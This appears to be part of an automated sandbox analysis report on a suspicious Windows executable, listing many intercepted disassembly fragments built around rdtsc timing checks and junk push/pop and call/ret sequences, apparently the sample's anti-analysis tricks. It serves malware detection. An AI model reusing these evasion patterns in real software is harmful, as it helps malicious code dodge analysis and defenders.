              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B868D second address: 5B86AA instructions: 0x00000000 rdtsc 0x00000002 je 00007FEBD8FBE238h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 jne 00007FEBD8FBE238h 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B86AA second address: 5B86AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D5B2F second address: 5D5B35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D5DE3 second address: 5D5DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D5DE9 second address: 5D5DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D5DF5 second address: 5D5DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D605F second address: 5D6065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D6065 second address: 5D6082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FEBD887DA88h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D6082 second address: 5D6087 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D6087 second address: 5D6098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FEBD887DA76h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D6098 second address: 5D609C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D637D second address: 5D6386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D64E1 second address: 5D6516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEBD8FBE236h 0x0000000a jmp 00007FEBD8FBE23Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FEBD8FBE243h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D6516 second address: 5D6520 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEBD887DA7Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D696A second address: 5D6974 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D6AAC second address: 5D6AB6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEBD887DA82h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D6AB6 second address: 5D6ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D6ABC second address: 5D6AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D6AC5 second address: 5D6AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D6AD1 second address: 5D6AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEBD887DA88h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D6AEF second address: 5D6AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D6AF5 second address: 5D6AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D753A second address: 5D7542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DBBB3 second address: 5DBBC3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEBD887DA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DBBC3 second address: 5DBBC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DC337 second address: 5DC34B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEBD887DA78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DC34B second address: 5DC351 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DC351 second address: 5DC375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEBD887DA82h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DC375 second address: 5DC379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DC379 second address: 5DC37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DC37F second address: 5DC389 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEBD8FBE23Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 59D3A3 second address: 59D3BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 59D3BF second address: 59D3C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FEBD8FBE236h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 59D3C9 second address: 59D3CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 59D3CD second address: 59D3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E22EF second address: 5E22F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E2596 second address: 5E259A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E280E second address: 5E2812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E2812 second address: 5E281C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E281C second address: 5E2870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEBD887DA81h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jbe 00007FEBD887DA88h 0x00000013 jns 00007FEBD887DA8Bh 0x00000019 jo 00007FEBD887DA7Eh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E29A6 second address: 5E29CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FEBD8FBE248h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E29CD second address: 5E29D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5F4B second address: 5E5F55 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5F55 second address: 5E5F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEBD887DA87h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5F70 second address: 5E5FBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 5AAA7422h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FEBD8FBE238h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 pushad 0x0000002a mov ebx, dword ptr [ebp+122D361Bh] 0x00000030 mov ax, di 0x00000033 popad 0x00000034 sbb di, 6406h 0x00000039 call 00007FEBD8FBE239h 0x0000003e push ebx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5FBD second address: 5E5FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5FC3 second address: 5E5FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEBD8FBE249h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5FE7 second address: 5E5FFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5FFE second address: 5E6008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FEBD8FBE236h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6008 second address: 5E6034 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jg 00007FEBD887DA8Bh 0x00000013 jmp 00007FEBD887DA85h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6034 second address: 5E6038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E663D second address: 5E6641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6641 second address: 5E665F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE23Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FEBD8FBE23Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E665F second address: 5E6663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E67A4 second address: 5E67A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6C1A second address: 5E6C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6C1E second address: 5E6C41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6C41 second address: 5E6C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6C46 second address: 5E6C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6C4C second address: 5E6C79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push ebx 0x0000000a mov esi, dword ptr [ebp+122D33F3h] 0x00000010 pop edi 0x00000011 nop 0x00000012 jl 00007FEBD887DA85h 0x00000018 jmp 00007FEBD887DA7Fh 0x0000001d push eax 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6DED second address: 5E6DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6DF3 second address: 5E6DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6DF7 second address: 5E6E18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE244h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6E18 second address: 5E6E1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6FED second address: 5E6FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6FFA second address: 5E6FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6FFE second address: 5E7004 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E7004 second address: 5E701C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEBD887DA84h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E701C second address: 5E7020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E96AC second address: 5E9708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007FEBD887DA78h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007FEBD887DA78h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d jnp 00007FEBD887DA76h 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 push edi 0x0000004a pop edi 0x0000004b pop ebx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E9571 second address: 5E9577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E9708 second address: 5E9712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FEBD887DA76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EA79B second address: 5EA7A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E9F11 second address: 5E9F17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E9F17 second address: 5E9F1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EC836 second address: 5EC83C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EC62A second address: 5EC630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EC83C second address: 5EC842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EC842 second address: 5EC846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EC630 second address: 5EC634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EDDCE second address: 5EDE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FEBD8FBE246h 0x0000000b jmp 00007FEBD8FBE242h 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 mov si, ax 0x00000016 push 00000000h 0x00000018 jmp 00007FEBD8FBE23Dh 0x0000001d mov dword ptr [ebp+122D1BD7h], edx 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007FEBD8FBE238h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000016h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D1B94h], edi 0x00000045 xchg eax, ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FEBD8FBE23Dh 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EF7D1 second address: 5EF7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EF7D7 second address: 5EF7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F1725 second address: 5F1734 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FEBD887DA76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EE6CE second address: 5EE6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EE6D2 second address: 5EE6D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5A0937 second address: 5A093B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5A093B second address: 5A094B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEBD887DA76h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F37AA second address: 5F37AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F545D second address: 5F5461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F642E second address: 5F6434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
